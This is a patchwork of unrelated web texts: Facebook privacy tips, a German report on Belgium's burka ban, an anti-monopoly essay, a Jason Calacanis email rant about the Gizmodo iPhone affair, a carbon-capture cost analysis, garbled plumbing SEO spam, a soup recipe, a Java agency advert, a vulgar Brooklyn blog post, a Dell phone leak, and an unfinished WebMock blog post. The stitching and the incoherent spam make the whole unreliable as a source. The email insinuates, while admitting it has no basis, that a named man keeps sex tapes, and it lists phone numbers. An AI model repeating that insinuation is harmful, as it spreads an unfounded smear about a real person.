This includes your Name , Profile Picture , Gender , Current City , Networks , Friend List , and Pages . "
On Monday , Facebook announced a transition where a " new type of Facebook Page " will make the " current city , hometown , education and work , and likes and interests sections of your profile " publicly available after you go through the transition tool ( or those items will be deleted ) .
Old video removed .
See above .
By default , the " Allow " checkbox for Instant Personalization is checked on your privacy settings .
If you do n't want the websites that you or your Facebook friends visit to know your information , you must opt out .
Since this process is a bit complicated , we have made a quick video showing step by step how to do so .
Simply unchecking the " Allow " box is not sufficient .
As Facebook explains , " if you opt out , your friends may still share public Facebook information about you to personalize their experience on these partner sites unless you block the application . "
Nor can you go to the Block Applications setting to block these partner sites .
This setting is only for showing which applications and sites are blocked , and unblocking them .
So , to opt out of this fully , you also need to go each page for Microsoft Docs , Pandora , and Yelp and push the Block Application button .
If Facebook adds another partner site to the program , you will need to block that as well , so be sure to check back often .
You may also want to review the settings for what friends can share and sharing your profile information .
Belgien hat als erstes europäisches Land ein Burka - Verbot beschlossen .
Ein Kopftuch ist dagegen weiter erlaubt .
Neben Belgien will auch die Regierung in Frankreich muslimischen Frauen das Tragen von Burkas verbieten .
Belgien verbietet als erstes europäisches Land das Tragen von Ganzkörperschleiern wie etwa einer Burka in der Öffentlichkeit .
Das belgische Parlament billigte am Donnerstagabend einstimmig ein entsprechendes Gesetz , berichtete die Nachrichtenagentur Belga .
Nur zwei Abgeordnete enthielten sich .
Bevor der Bann in Kraft treten kann , muss aber noch der Senat zustimmen .
Einen Termin gibt es dafür nicht .
Belgien hat nur noch eine geschäftsführende Regierung , die von dem flämischen Christdemokraten Yves Leterme geführt wird .
Es ist wahrscheinlich , dass es im Juni Neuwahlen geben wird .
Die Abstimmung war in der vergangenen Woche wegen der Regierungskrise verschoben worden .
Der Gesetzentwurf verbietet das Tragen von Kleidungsstücken , die eine Identifizierung der Person im öffentlichen Raum - also Schulen , Krankenhäuser , Busse oder Bahnen - unmöglich machen .
Feste wie Karneval sollen von der Regel ausgenommen sein - ebenso wie Motorradfahrer , für die Helmpflicht gilt .
Der Text nennt den Ganzkörperschleier Burka nicht ausdrücklich .
Als Strafe bei Missachtung der Regel sind 25 Euro Geldbuße oder bis zu sieben Tage Gefängnis geplant .
Gemeinden können das Bußgeld bis auf 250 Euro erhöhen .
Ein Kopftuch ist dagegen weiter erlaubt .
Neben Belgien will auch die Regierung in Frankreich muslimischen Frauen das Tragen von Burkas verbieten .
In der Debatte um das Verbot hatte es in den vergangenen Wochen Zweifel gegeben , ob das Gesetz vor dem belgischen Staatsrat oder dem Europäischen Gerichtshof für Menschenrechte Bestand haben kann .
" Die Regel könnte den bürgerlichen Freiheiten widersprechen " , hatte der Grünen - Abgeordnete Fouad Lahssaini gesagt .
Der Ganzkörperschleier bei den rund 500 000 Muslimen in Belgien ist absolut selten .
Eine Statistik über Burka - Trägerinnen existiert nicht .
Nach früheren Informationen der Zeitung " Le Soir " haben acht Gemeinden in der Region Flandern , die bereits seit Jahren den Ganzkörperschleier im öffentlichen Leben verbieten , 2009 lediglich 29 Geldbußen verhängt .
Although some Americans worry about the growing power of the government , few understand the real power that controls their everyday lives .
Private monopolies determine the brand of breakfast cereal we eat , the type of car we drive , where we bank , the medical treatment we receive , the fashion of our clothes , and the kind of toothbrush we use , in addition to the beer we drink , the health insurance we buy , and what we feed our pets .
Under the guise of " the free market , " conglomerates merged and bought up smaller companies , until , today , they dominate their respective markets in every commodity offered for sale in the U.S .
In this race to consolidate , companies " rationalized " their offerings , in many cases dropping up to 40 percent of what they formerly produced .
They buy from the same suppliers , use interchangeable parts and common ingredients , and re-name similar brands , essentially placing the same product in different packages .
For example , one company produces all of the pet food under 150 different brands .
" People say we have an uncontrolled free market but we have the opposite , " says Barry C. Lynn , senior fellow at the New American Foundation .
" What we have today is a laissez - faire American version of feudalism ; a private government in the form of private corporations run by private individuals who consolidated power to govern entire activities within our political economy . "
In a new book , Cornered : The New Monopoly Capitalism and The Economics of Destruction , Lynn describes the many past struggles in America between small elite oligarchies and democratic government .
Throughout our history , Americans have beaten back the attempts of monopolies to control various industries .
The Boston Tea Party fought to overturn monopolization of commerce by the private British East India Company .
Alexander Hamilton 's attempt to help his friends out with the whiskey tax , led to the Whiskey Rebellion .
People acting through government prevented a small elite from controlling our railroads , steel mills , the oil industry and other concentrations of power .
" In the case of railroads , people realized they could consolidate power discriminating against some companies by charging them higher rates and stripping them of cash , " says Lynn .
" The American people then decided that if you had a monopoly hauling goods , you have to charge everyone the same rate .
We used our government to keep them from consolidating political and economic power . "
According to Lynn 's research , early Americans made decisions to balance power between farmers , consumers and the market itself .
This is why we created " open and public markets . "
Labor , managers , engineers , shareholders , and local communities ran our corporations , which are social institutions .
The ultimate function of a well - regulated open - market system is not to ensure an “ efficient ” distribution of resources , but " to reveal , harness , and direct power within a society in order to ensure the widest possible distribution of political freedom and the greatest possible degree of political and economic stability , " says Lynn .
With the election of Ronald Reagan , conservatives redefined " free enterprise " to mean the unfettered power of an individual to amass as much wealth as possible , while liberals sought to use planning and efficiency to lower costs , even if it resulted in the loss of some economic freedom .
Using theories developed by Chicago School of Economics leaders such as Milton Friedman and Alan Greenspan , Reagan directed the Justice Department to base anti-trust decisions on a vision of efficiency as measured solely by lowered costs .
" Before Ronald Reagan we accepted inefficiencies to protect a free political system , " says Lynn .
" In 1981 , we changed laws to a consumer welfare test , measured by price and economies of scale ; hence , any consolidation can appear to promote the welfare of the consumer .
Unlimited growth was made acceptable .
This was a revolutionary overthrow of our antimonopoly laws . "
Today libertarian think tanks such as the CATO Institute , serve as " the vanguard of a neofeudalist movement " to attack democratic government .
They and other conservative propagandists have spent $ 30 billion in the past 30 years to promote their agenda and convince people that massive layoffs , foreign competition , and higher prices are the result of " natural free - market forces . "
Squeezed from all sides , some Americans react by becoming corporate shock troops attacking their own government .
" Those who control our corporations managed an Orwellian achievement to redefine the use of brute corporate force as ' market forces , ' " says Lynn .
" We still believe in a consumer utopia , but we have an illusion of choice .
Corporate powers manipulate our decision - making and direct us to buy certain goods at certain prices . "
Institutional power shifted to Wall Street and large financial institutions .
Today a small elite runs corporations to serve themselves as they concentrate their power .
Some Americans are waking up to the reality of their situation , but Congress lacks the will to regulate corporate power .
" If we choose to protect our republican way of government , which depends on the separation of powers within our economy and our political system - then we have only one choice , says Lynn .
"
We must restore antitrust law to its central role in protecting our economic rights and breaking up dangerous concentrations of power . "
_______
About author Don Monkerud is an Aptos , California - based writer who writes about culture and politics .
He can be reached at Don Monkerud is an Aptos , California - based writer who writes about culture and politics .
He can be reached at monkerud@cruzio.com
" Lost ? "
You can't be serious
This post is from Jason Calacanis 's email list , which you can sign up for here : http://jasonnation.com.
You can also read and comment on the post here .
I am not a lawyer and I do not have all the facts about the stolen iPhone , but I 'm not going to let that stop me from passing judgement on this case .
Background
================
As you all know , Gawker Media which publishes the gadget blog Gizmodo.com , recently bought a lost iPhone prototype for $ 5,000 .
The police have started an investigation into the case , which so far has included a raid on Gizmodo blogger Jason Chen 's home resulting in the confiscation of his computers .
Gawker Media is claiming that Jason is protected under the journalist shield laws and everyone is debating exactly the wrong issue : the legal ones .
Now , I know Nick Denton very well and consider him a friend .
We were vicious competitors when my company Weblogs Inc battled his Gawker Media - - a battle that resulted in our gadget site Engadget decimating Gizmodo in the rankings for years .
After I sold the company to AOL Denton 's Gizmodo was able to quickly catch up and surpass Engadget - - something I wold have never allowed .
But I digress ...
Bottom line : I think Nick is a publishing genius and I 've enjoyed our stolen moments , and the fine meals we 've shared in Aspen , Los Angeles and New York over the last few years .
Of course , I 'm saying all of those nice things about Nick because I 'm about to trash him .
Reality Check
================
The fact that we 're even debating a very simple case like this shows exactly how entitled and misguided our world has become .
This is all very simple , so let 's see if we can sum it up in ten points or less and get back to work shall we ?
1 . You can not knowingly traffic in stolen or " found " goods .
It is unethical and illegal .
When you find a phone in a bar you give it to the bartender .
You do not try and sell it for 10 x it 's value .
If you do , you are a scumbag and a criminal .
2 . If someone offers you a pile of cash for an item you found , and that you know is not yours , than you are a thief .
A criminal .
That 's it -- there is no further discussion .
3 . If you disagree with # 2 , then let me take your little brain through a bigger and illuminating example ( That 's what we do with dumb people - - or children -- when they are confused : you make something bigger so they can understand it ! ) .
You see a silver Mercedes parked in front of your house .
There are keys in it .
You get in the car and see that it has a bunch of new features that the standard Mercedes you drive lacks .
Oh , and it belongs to someone named Dieter Zetsche .
You take the car and drive it home , then call automotive magazines and offer to sell this prototype you found , and know the owner of , for 10 x the street value of the car ( say , $ 1M ) .
What are you now ?
Yes , a criminal !
Whether the item is worth $ 600 or $ 60,000 is not relevant .
4 . If you offer to pay someone for stolen goods you are , well , a criminal ( or , if you prefer , a fence , as Loren Feldman pointed out in his excellent video on the subject ( http://bit.ly/aouSzB).
A fence is someone who buys stolen goods for resale later .
In this case the later resale is page views and more importantly inbound links , which considering the SEO value makes the $ 5,000 at a heck of a bargin .
Gizmodo and Gawker have made $ 10 M worth of media on this -- literally .
If you even could buy the air time on TV , radio and the print space they 've gotten it would cost tens of millions of dollars .
Nick Denton is a genius who knows this -- and that is why he did this .
5 . I do n't know Jason Chen , but based on his behavior he is either really stupid or naive .
Jason , you got some really bad legal advice from Nick Denton when he told you that there was nothing to worry about .
Nick Denton 's publishing model has always been to hire young kids and get them to do stupid things on his behalf for the chance at a low paying job and a nice resume building gig .
Getting a blogger to traffick in stolen goods is his greatest accomplishment to date , but on a regular basis he gets kids to attack and try to destroy people on his behest on a regular basis -- all in the name of traffic ( and sometimes his own personal politics and sense of justice ) .
Sometimes these people deserve it and sometimes the facts are correct .
Many times they do n't and they 're not .
6 . Using the journalist shield laws to traffic in known stolen goods is really lame .
Those laws were setup to protect journalists doing really important work - - not for profiteering .
If Denton is allowed to abuse these laws then get ready for a free - for - all as TMZ journalists start breaking into Nick Denton 's SoHo loft to raid his collection of home made , HD quality sex tapes .
Note : I do n't know that Denton has a collection of HD quality sex tapes -- but I do n't know that he does n't !
See what I did right there by saying " I do n't know , but I do n't not know ? "
That 's called CYA journalism right there baby ... do whatever the f- you want !!!
Yeah bitches !!!
Free for all journalism FTW !
7 . The police raiding a bloggers house over a phone that is coming out in six weeks is , on the surface , equally lame .
Do the police really need to raid his home when he is not there ?
Ca n't you simply subpoena his records ?
Then again , if we blow this up to the stolen Mercedes example , or perhaps a stolen billion - dollar cancer drug being worked on by a pharmaceutical company , would it seem as extreme ?
Anyway , it 's lame .
These cops are from a sleepy town and this is their Columbo moment , so I guess we have to let them have it .
But breaking a blogger 's door down ?
Really ?
Come on .
8. Steve Jobs is responsible for all this .
He created an environment where consumers and bloggers are on tilt , desperatly trying to get a few crumbs of information about his amazing new products .
Jobs will go down in history as the greatest marketer of all time .
9 . If you are a journalist and you found the phone , played with it and wrote a story about the experience before giving it back to Apple that would be OK .
On an ethical basis you could debate the issue of taking the high road and returning it without covering the details of it , but that 's a personal style issue in my mind .
You find something and write about the experience there is no issue .
That is NOT what happened here .
10 .
If this was a case of buying stolen or found prison photos from Abu Ghraib , and there was a societal benefit to the release of those photos , people would be forgiven .
In fact , if there were photos of Abu Ghraib in someone 's private residence or a company and a journalist broke in to get those photos society might actually forgive them .
In this case , you do n't get any wiggle room because getting society the details of the iPhone 's upcoming features -- that were in Nokia phones from two years ago -- does nothing to help society or cure some injustice .
If you think Gawker solved some huge injustice here you need your head examined .
In summary :
a ) Gawker / Nick Denton = guilty
b ) Jason Chen = guilty ( of being gullible )
c ) iPhone seller = guilty
d ) Using Shield Law defense = lame
e ) Gestapo Cops = very lame
Bottom line :
What is wrong with the world that we 're obsessed with the lame features in the next iPhone --" OMG !!!
it's got a camera on the front and the back !!!" -- when we 're still occupying two countries in the Middle East , unemployment is cresting at known civil unrest levels and Goldman Sachs raped and pillaged our Union , then GOT BAILED OUT for doing so with the help of dopey President Obama whose trusted advisors are -- wait for it -- Goldman alumni !
Rome is burning while Denton and Jobs are running the Colosseum .
panem et circenses
-----------------
Jason Nation mailing list : www.jasonnation.com to singup or sign off .
If you have a problem unsubscribing email unsubscribe@calacanis.com
--
---------------------
Jason McCabe Calacanis
CEO , http://www.Mahalo.com
Office : 310-593-6134 / Mobile : 310-456-4900
Blog : http://www.calacanis.com
Mailing list : http://bit.ly/jasonslist
Twitter : http://www.twitter.com/jason
AOL IM / Skype : jasoncalacanis
Jason 's opinions and conclusions are his own , not SAI's .
When I looked at the situation in 2007 , the European Union hoped to have 12 large CO2 capture and storage demonstration projects at coal plants of at least 250 MW of capacity in place by 2015 , requiring an investment of 5 billion euro .
Progress has been slow , however .
At the end of 2009 , after 13 months of discussion , the European Union finally made the decision to invest 1 billion euro in six demonstration projects .
In February , 2010 another 300 million euro was made available , which would be sufficient for two more CO2 capture and storage demonstration projects .
The expectation behind these investments are that they will lead to significant cost reductions , making the technology affordable by 2020 .
Capturing carbon dioxide from coal ( and gas ) fired electricity plants , and subsequently transporting carbon dioxide from the plant and storing it underground in ( abandoned ) oil / gas fields , in other geological formations or on the ocean floor , seem like an excellent solution for continued fossil fuel use in the coming decades .
In 2007 , I participated in an evening group discussion about possibilities for the Dutch economy relating to capturing and storing carbon dioxide .
After two interesting talks , one outlining the technical possibilities for storage in the Netherlands and the other the commercial possibilities , one of the other participants made a remark that was spot on .
No matter how wonderful the idea of capturing and storing carbon dioxide may sound , it will always be costly to do so relative to current electricity production costs .
The additional costs were estimated by the IPCC in a 2007 special report on carbon dioxide capture and storage at 1 to 5 cents per kilowatt - hour ( with these cents computed in US$ ) , with the difference depending on the type of power plant , the technology employed for capturing , the reservoir in which the CO2 is stored , the transporting distance and other variables .
The largest share of the costs originate from the extra energy needed to capture a pure stream of carbon dioxide for storage .
The IPCC estimates the costs using a broad range of publications for different power plants as follows :
“ Application of CCS to electricity production , under 2002 conditions , is estimated to increase electricity generation costs by about 0.01 –0.05 US dollars per kilowatt hour ( US $ / kWh ) , depending on the fuel , the specific technology , the location and the national circumstances .
Inclusion of the benefits of EOR [ enhanced oil recovery ] would reduce additional electricity production costs due to CCS by around 0.01 –0.02 US $ / kWh ”
More specifically :
“ The application of capture technology would add about 1.8 to 3.4 dollar cents per kWh to the cost of electricity from a pulverized coal power plant , 0.9 to 2.2 dollar cents per kWh to the cost for electricity from an integrated gasification combined cycle coal power plant , and 1.2 to 2.4 dollar cents per kWh from a natural gas combined - cycle power plant .
Transport and storage costs would add between – 1 and 1 dollar cents per kWh to this range for coal plants , and about half as much for gas plants .
The negative costs are associated with assumed offsetting revenues from CO2 storage in enhanced oil recovery ( EOR ) or enhanced coal bed methane ( ECBM ) projects .
Typical costs for transportation and geological storage from coal plants would range from 0.05 –0.06 dollar cents per kWh . ”
Figure 1 - Costs of Carbon Capture and Storage in dollars per kWh from the IPCC report
Figure 2 - Costs of Carbon Capture and Storage in dollars per ton of CO2 avoided from the IPCC report
When I did my analysis in 2007 , the industrial base price of electricity in the Netherlands was about 7 eurocents per kWh or 9.6 dollar cents per kWh .
This was in the high range relative to other European countries .
For the most likely application - - a pulverized coal power plant -- the additional cost of capture and storage would amount to 20 % to 30 % over and above the industrial base price .
This is confirmed by a recent study to published in Energy Policy , volume 35 , Issue 9 , September 2007 , pages 4444 - 4454 : “ Cost and performance of fossil fuel power plants with CO2 capture and storage “ .
The authors , E. Rubin et al , estimate a cost increase of 15 % to 30 % .
They base this on a wide range of previous publications .
To cover these costs in the long run in a market environment , companies are looking at two distinct options .
First , there is the hope that carbon capture and storage can be paid by the pricing of carbon dioxide through the European emissions trading scheme .
Second , the possibility of enhanced oil recovery by carbon dioxide injection in oil fields could offset some of the costs incurred .
The European emission trading scheme is an initiative under the Kyoto protocol .
It provides Europe with a market to trade greenhouse gas emission allowances or emission reduction units .
Each individual company is given an assigned amount of Kyoto Protocol Units or Carbon Credits which can be increased or decreased through several mechanisms .
Every carbon credit is equivalent to a reduction of one ton of greenhouse gas emissions .
Within the trading scheme , a party is allowed to transfer their carbon credits to or from another party .
An unlimited number of units may be acquired by emissions trading while only a limited number may be transferred to another party .
At the moment , carbon capture and storage is not incorporated as a possibility for mitigation under the emissions trading scheme .
The European carbon credit market passed its test phase and became effective in 2008 .
During the test stage before 2008 , it did not function very well because too many credits were handed out , thereby putting a downward pressure on the price of a ton of carbon .
We can see this in Figure 3 below .
In April 2006 , when news came out that countries had a surplus of credits , their value began dropping significantly .
During 2008 when more players entered the market and the market became effective , the cost of a ton of CO2 rose significantly , up towards 40 euro , but from June onwards the price dropped significantly due to investor expectations being adjusted by developing events in the economy .
As the economy has only slowly picked up somewhat , and energy consumption is still low relative to early 2008 levels , the price of CO2 is still very low as shown in Figure 4 below .
Figure 3 - Price development per ton of Carbon dioxide under the European emission trading scheme , source : www.emissierechten.nl.
Figure 4 - Price development per ton of Carbon dioxide under the European emission trading scheme from November 2007 to March 2010 , source : www.emissierechten.nl.
Now , in 2010 , the price for a carbon credit lies between 12 and 18 euros per ton CO2 .
In relation to the costs of carbon capture and storage this is much too low .
In Table 2 , the cost estimates from the IPCC for a pulverized coal power plant are shown to be between 30 to 70 dollars per ton CO2 or 20 to 50 euros .
The present price makes the technology an economic disaster at any location .
It is difficult to predict whether the price of carbon will increase because the development of the market is heavily dependent on economic developments and political negotiations .
For instance , will more countries outside the European Union join in the trading in the future ?
Will the amount of carbon credits handed out be adjusted to the new economic situation ?
Next to emissions trading , there are high hopes for enhanced oil recovery .
In my opinion , these hopes are overblown , given that the technique can only be applied commercially at very few oil fields .
This was recently highlighted by Statoil and Shell .
The companies dropped plans to store CO2 at the Draugen oilfield in Norway because economic analysis showed that it was uneconomical to do so .
Nonetheless , enhanced oil recovery is often considered as a possible option as explained in the case study below .
Pioneering Carbon Capture and Storage : Rotterdam Harbour
One of the 12 large CO2 capture and storage demonstration projects that the European Commission wants to develop by 2015 could very well be located in the Dutch harbour of Rotterdam .
In 2007 , the environmental agency of the Rijnmond Region , in which Rotterdam Harbour lies , calculated that it would be possible to capture and store up to 20 million tons of carbon emissions from the Rotterdam region annually for only 24 euro per ton of CO2 ( PDF in Dutch , 3.6 MB , 56 pages ) , a price that is much lower than normal thanks to efficient usage of energy .
A significant amount of heat created by local industry is wasted which can be applied for usage in the capture process .
The environmental agency has assumed that this waste heat can be utilised for free as input in the capture process , hence the huge reduction in costs for capture and storage .
However , it still remains to be seen whether the local companies will comply with giving away their waste heat for free -- no one has asked the companies formally thus far .
In the analysis of the agency , if a price of 24 euros per ton of CO2 can be realized ( which is much higher than the current trading range of 12 to 18 euros ) , then this project would be viable under the European emission trading scheme .
Additional funding could be gained by the application of enhanced oil recovery according to the environmental agency of Rijnmond .
In the agency 's analysis , they assume that two additional barrels of crude oil will be produced for every ton of injected CO2 .
They also assume an oil price of 30 dollars per barrel .
However , this income flow is very variable .
When applicable at an oil field , the injection of carbon dioxide will only be maintained for a few years .
Beyond that period , it is not expected to not deliver additional production benefits , so the income flow can be expected to slow down and then come to a halt .
Furthermore , time is running out , because many fields that appear to be suitable for carbon dioxide injection for enhanced oil recovery will be closed down in the period of 2008 to 2012 .
By 2018 , very few oil fields will be available for injection purposes .
Summarizing
While the idea of carbon dioxide capture and storage seems excellent , the costs are a large hurdle that might cancel this option altogether .
Only with continued political support will this technological mitigation option for climate change become viable .
The best option in pursuing this technology is full support of carbon dioxide capture and storage in the European emissions trading scheme , to make pioneering projects such as the one proposed at Rotterdam harbour viable .
For larger application beyond a few projects , the price of a ton of carbon needs to increase , or the costs of capture and storage will need to come down significantly .
Whether this will happen in the long term future is doubtful .
Closest Plumber Milwaukie OR Rated 5 /5 based on 996 reviews .
Clean overflow holes as part of your annual maintenance , and any other time you are handling general plumbing repairs .
You can save lots on energy with efficient shower heads .
The shower uses most of the hot water .
You can save up to a few hundred dollars a year by simply installing shower heads that are energy efficient .
Dishwashers that have too much water running into them could have a hose installed improperly .
The water will not drain into the dishwasher from the sink if it is configured in an uphill and downhill position .
If you need to replace your shower head , make sure that you buy a new one that is high quality .
Choosing the cheapest shower head in the store can end up costing you more in the long run .
Inexpensive shower heads are not terribly sturdy , though , and may not hold up to daily use .
Clean out your dryer 's lint filter .
This can save you a lot of trouble , including preventing fires .
Recommended Plumbing Companies McMinnville OR
Toilets , sinks and some other fixtures can have cut off valves of their own .
The aerator should be removed and taken apart .
Then , clean with a tiny brush swabbed in vinegar .
Finally , rinse off the aerator , put it back together and then reattach it to your faucet .
Doing so will assist in increasing water pressure since obstructions in the aerator are removed in this process .
Realize that branch lines can get blocked and cause sewage backups that affect main lines .
If you are not able to remove the blockage , you need to contact a professional to snake the line clear .
If valves are seldom used they may become fused .
Clean them using penetrating oil by turning them regularly to prevent them from sticking .
Carefully choose drain cleaners .
A number of them have strong chemical ingredients that damage pipes .
Make certain the one you buy is a brand known for pipe safety .
Gas Furnace Problem
A regular old pipe snake could be all it takes to clean out a clogged drain stack on your washing machine .
Make sure you protect your hands and arms if you are still going to use these products . , Give all drains strainers to gather particulate matter that can clog pipes .
Clean debris from these strainers after each use .
The ones in the bathroom can be cleaned out as needed .
Keep your garbage disposal clean to make sure it lasts for awhile .
You can use dish soap , lemon peels , and cherry pits to get your garbage disposal clean and fresh and running well .
Schedule all your plumbing work at the same time .
You might be tempted to have a plumber come out for every little thing that happens , but kicking the can on some issues until you have a list means you can save a few bucks .
Also , combining smaller jobs into one larger job lets the plumber finish his work faster and therefore saves you money .
Keep the drain in your bathtub working well by pouring one cup baking soda into the drain quickly followed by about a cup of white vinegar .
Cover with a rag or plug , as a chemical reaction will occur in the pipes .
Allow some time to pass , then follow up by pouring down boiling hot water .
Call Us Today to Learn More About Cheap Emergency Plumbing Gold Beach OR
Your shower consumes a majority of the hot water usage in your home .
Find A Good Plumber Keizer OR ,
If you want your garbage disposal to have the same lifespan as your total home , clean it regularly .
By incorporating a regular cleaning routine , your garbage disposal can stay running smoothly .
One way to clean your disposal is to run dish detergent and lemon rinds through your garbage disposal .
As an added benefit , this technique will also eliminate any scents from your disposal .
Run cold water through your garbage disposal .
Cold water keeps blades sharp and encourage a smoother disposal .
ThinkProgress :
In the U.S. House and Senate , however , Republicans have been far quieter .
ThinkProgress rounded up at least five Republicans who have spoken out in favor of the law and three who have been non-committal .
The only Republican to condemn it so far is Rep. Lincoln Diaz - Balart , a Hispanic lawmaker from Florida who is retiring .
On Saturday , Josh went snowboarding with his friend .
I was n’t invited , not that I wanted to go , I hate the snow , cold , and scary , steep mountains : )
I have tried skiing twice , but I am not a fan .
I prefer to stay inside where it is warm .
So I spent the day cooking and baking - that is my idea of a good time .
I wanted Josh to come home to something hearty and warm , so I made a black bean sweet potato soup .
We love black bean soup at our house .
We have a couple favorite recipes , but I wanted to try something new .
I had a large sweet potato lying on the counter and decided to throw it into the mix .
It turned out to be the shining star in this soup .
It gave the soup great color , texture , taste , and added nutrients .
This soup is very filling , but in a “ good for you ” way .
I made a large batch so we could freeze half of it for later .
I am glad I did because I am already wanting more : )
Josh loved it too , it was the perfect post snowboarding meal .
Black Bean and Sweet Potato Soup 5 from 1 vote Print ReviewSave Recipe Ingredients 1
T olive oil
1 red onion chopped
3 cloves garlic minced
1 large sweet potato peeled and chopped
1 roasted red pepper chopped ( you can use jarred )
2 cans low sodium vegetable broth 15 oz .
size
2 cups water
3 cans low sodium black beans rinsed and drained
3 cans diced tomatoes with green chiles
1 T chili powder
2 teaspoons cumin
Dash of red pepper flakes
1/2 bunch of cilantro chopped
Salt and pepper to taste Instructions 1 .
In a large soup pot , heat the olive oil .
Add in the onion and cook until tender .
Add in the garlic and cook for about 2 minutes .
2 . Stir in the sweet potato and roasted red pepper .
Cook for 5 minutes .
3 . Add in the broth , water , black beans , and tomatoes .
Stir well .
4 . Add the chili powder , cumin , and red pepper flakes .
Stir and toss in the cilantro .
Stir again .
Let the soup simmer on medium low for 30 minutes , or until the sweet potatoes are soft .
5 . Season with salt and pepper and serve hot .
** You can garnish the soup with cilantro , avocado slices , cheese , tortilla strips , and / or sour cream .
To freeze - cool completely and put the soup in freezer safe containers .
**
If you like this Black Bean and Sweet Potato soup , you might also like :
Black Bean and Sweet Corn Soup with Cilantro and Lime from Two Peas and Their Pod
Black Bean Pumpkin Soup from Smitten Kitchen
Sweet Potato and Peanut Soup from Closet Cooking
Turkey and Sweet Potato Soup with Black Beans and Lime from Kalyn ’s Kitchen
Java Web Application Development Our Java web application development team is to leverage dynamic coding properties of Java to create a dynamic and interactive web application for the modern clientele .
We create a flexible , extensible , easily accessed , and time - tested web application that lasts long .
Java Applet Development
For vertical web portal ( Vortal ) development , our hire web portal designers address your industry or business niche specific needs including information , resources , interests , forum , news , and newsletter by providing the latest and appropriate tools .
Integration of custom search algorithm makes your Vortal Avant - grade tool for your business .
Java Web Services Development Our Java web service development team developed web services in Java , which can talk with any OS and machine on the web .
Thus , we make communication between the various application smooth , and application independent from technologies and platforms .
Java Integration Services
Our Java integration team is capable of integrating a variety of services / module like DB , Feed , Security , and SOAP among different apps in enterprise and other environments .
Thus , we provide SOA connectivity to grow business further .
Java Product Development Our Java product development team creates Java - based software products with versatility , expandability , and customizable to scale in the future .
We create products with security , cross- platform compatibility , and performance orientation like traits to meet the cutting - edge technology requirements .
Java Mobile App Development Our Java mobile app development team use Java capabilities in Android development to create advanced mobile apps for native and hybrid platforms .
Moreover , we use Java to create back - end data services to enable interaction of mobile apps with various kinds of databases and web services including REST , SOAP , and JSON .
Java Enterprise Development
We know Java is at the heart of the leading enterprise applications .
So , we design secure , scalable , interactive , and extensible web applications , mobile applications , web portals , CMS , CRM , and desktop enterprise applications we use our innate expertise on various Java technologies in our Java enterprise development .
Reader Contribution Du Jour : The McCarren Park Tree Twat , Revisited
This find hails from ( where else ? )
Bedford Avenue and North 12 Street and comes courtesy of Alex who writes :
See the attached photo for something I spotted in McCarren park this past Saturday .
Someone saw fit to adorn the park ’s vaginal tree with a piercing … classy .
Where ’s Larry Flynt when you need him ?
Miss Heather
UPDATE , August 30 , 2010 : It has come to my attention that this piece has been linked to by AOL .
This is a New York Shitty first !
In this tome ( which you can read here ) the author — for reasons only known to him — saw fit to get a quote from Gersh Kuntzman of the Brooklyn Paper .
Why , I do not know .
Mr. Kuntzman is a lot of things , but an expert on north Brooklyn is not one of them .
What ’s more he has a nasty habit of lifting content from blogs — mine among them .
In some circles this is considered plagiarism .
Suffice it to say I am not a fan of Mr. Kuntzman .
With the previous disclosure I present to you what he had to say about the above item ( and vagina trees in general ) :
I think I speak for all Brooklynites who love vaginas — and I ’m speaking for a lot of people , so I understand the gravitas — when I say that the only place to truly enjoy a vulva of any kind is in McCarren Park .
Given that this gent has seen fit to videotape himself molesting a multimillion dollar apartment and that I was in McCarren Park just yesterday this , well , makes me more than a little nervous .
Methinks I ’ll be patronizing Gantry State Park in Queens moving forward .
I would advise you , dear readers , to follow suit : the sticky stuff on our foliage might not be sap !
Related
Comments
It 's like Dell 's making up for lost time with smartphones : while " Lightning " is the company 's answer to Windows Phone extravagance , the Dell Thunder that 's leaking out along side does up Android 2.1 with similar aplomb and a 4.1 - inch WVGA OLED screen .
There 's a heavily custom Dell " Stage " UI on top , which seems much different ( and classier ) than what we 've seen on the Streak or Aero .
It apparently ties into Facebook and Twitter for social networking , and taps Swype for a touchscreen keyboard replacement , along with grabbing just a pinch of HTC's Sense good looks .
Dell 's document also claims this has Flash 10.1 for watching web videos , along with a mention of an " integrated web video Hulu app . "
We 're not sure how that works , but hopefully it 's everything we ever dreamed mobile Hulu could be .
Under the hood we 'd guess there 's the same Snapdragon chip that 's powering the Lightning , but we do n't have specific specs .
There is supposed to be an 8 megapixel camera , however , and the phone will be sold in AT&T and world - friendly HSDPA versions around Q4 of this year , with an LTE model to follow near the end of 2011 .
We can hardly wait .
This post was originally published on the New Bamboo blog , before New Bamboo joined thoughtbot in London .
I ’ve been working recently on a Ruby application which was making HTTP calls to a remote service .
We chose rest - client as a client HTTP library .
We needed some way of testing the behaviour we were going to implement .
We wanted to run our tests in isolation , without making any real requests over the Internet .
One obvious option was to use some mocking library to stub rest - client methods and set expectations on them .
Doing this is always a pain .
You usually end up testing the implementation instead of behaviour .
If you use Net:: HTTP directly then to spec code like this :
res = Net :: HTTP . start ( " www.google.com " , 80 ) { | http | http . get ( " / " ) }
you have to write the following code in RSpec :
@mock_http = mock ( " http " ) Net :: HTTP . stub ! ( : start ) .
and_yield @mock_http @mock_http .
should_receive ( : get ) . with ( " / " )
If you change your HTTP library , even if both libraries are based on Net: : HTTP and behaviour of the application wo n’t change , you still need to fix all your tests where you stubbed methods specific to HTTP library .
Fakeweb as a good alternative .
It allows stubbing HTTP requests at low Net:: HTTP level so it works with any library built on top of Net:: HTTP .
Dispite Fakeweb ’s excellent solution to the problem , it has unfortunately couple of limitations we were missing .
Requests can be matched only by HTTP method or URI and we needed to match POST requests based on body and headers .
Fakeweb also did n’t support matching of escaped and unescaped URIs .
Another feature I was missing was setting expectations on request invocations .
Pat Allan ’s fakeweb - matcher is some solution but it has the same issues as Fakeweb and I also needed to set some more advanced expectations .
At the beginning I planned to take Fakeweb ’s source code and extend it but I soon realised that Fakeweb ’s architecture will make it quite difficult .
During our Hackday I started working on a new library for stubbing HTTP requests .
That ’s how WebMock was born .
Here are some of the main WebMock features :
Stubbing HTTP requests at low Net:: HTTP level ( no need to change tests when you change HTTP lib interface )
Setting and verifying expectations on HTTP requests
Matching requests based on method , URI , headers and body
Smart matching of the same URIs in different representations ( also encoded and non encoded forms )
Smart matching of the same headers in different representations .
Support for Test :: Unit and RSpec ( and can be easily extended to other frameworks )
Support for Net:: HTTP and other http libraries based on Net:: HTTP ( i.e RightHttpConnection , rest - client , HTTParty )
Easy to extend to other HTTP libraries apart from Net:: HTTP
Here is an example code using WebMock in Test : : Unit
